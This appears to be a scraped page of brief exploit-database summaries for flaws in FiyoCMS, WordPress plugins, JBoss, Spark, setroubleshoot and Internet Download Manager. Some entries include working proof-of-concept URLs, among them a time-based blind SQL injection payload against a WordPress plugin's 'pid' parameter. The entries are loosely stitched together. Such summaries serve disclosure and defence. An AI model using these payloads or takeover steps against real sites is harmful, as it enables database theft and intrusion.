Several security issues have been identified on the latest FiyoCMS platform. Multiple SQL Injection and XSS vulnerabilities have been identified, as well as a Direct URL Access Bypass vulnerability. The SQL Injection vulnerability can be exploited by sending a maliciously crafted request to the vulnerable application, while the XSS vulnerability can be exploited by sending a maliciously crafted request containing a script. The Direct URL Access Bypass vulnerability can be exploited by sending a maliciously crafted request to the vulnerable application.
This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin. Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ]. 'pid' variable is not sanitized. POC: /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi] example: /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. It can be used to test the presence of JMX Console and Web Console, which are vulnerable to remote code execution.
setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py, a PoC was attached which uses networkmanager's openvpn plugin to execute arbitraty commands by triggering an access violation to a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when its shipped enforcing by default.
Spark clusters which are not secured with proper firewall can be taken over easily (Since it does not have any authentication mechanism), this exploit simply runs arbitarty codes over the cluster. All you have to do is, find a vulnerable Spark cluster (usually runs on port 7077) add that host to your hosts list so that your system will recognize it (here its spark-b-akhil-master pointing to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary codes that you want to execute.
Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. Proof of concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL_INJECTION_HERE
Parameter 'theme_id' in GET and parameter 'image_id' in POST are vulnerable to SQL Injection. An attacker can inject malicious SQL queries to gain access to the database and extract sensitive information.
Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. This can allow the attacker to download any file from the server.
This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). Whenever the JMX Invoker is exposed with the default configuration, a malicious 'MarshalledInvocation' serialized Java object allows to execute arbitrary code. This exploit works even if the 'Web-Console' and the 'JMX Console' are protected or disabled.
IDM v6.20 Local Buffer Overflow is a local exploit which allows attackers to execute arbitrary code on vulnerable installations of Internet Download Manager. The vulnerability is due to a boundary error within the processing of the username field when configuring a VPN/Dial Up connection. By sending a specially crafted string, an attacker can overwrite the EIP register and control the flow of execution. This can be exploited to execute arbitrary code by sending a malicious string to the username field when configuring a VPN/Dial Up connection.
Services By CQR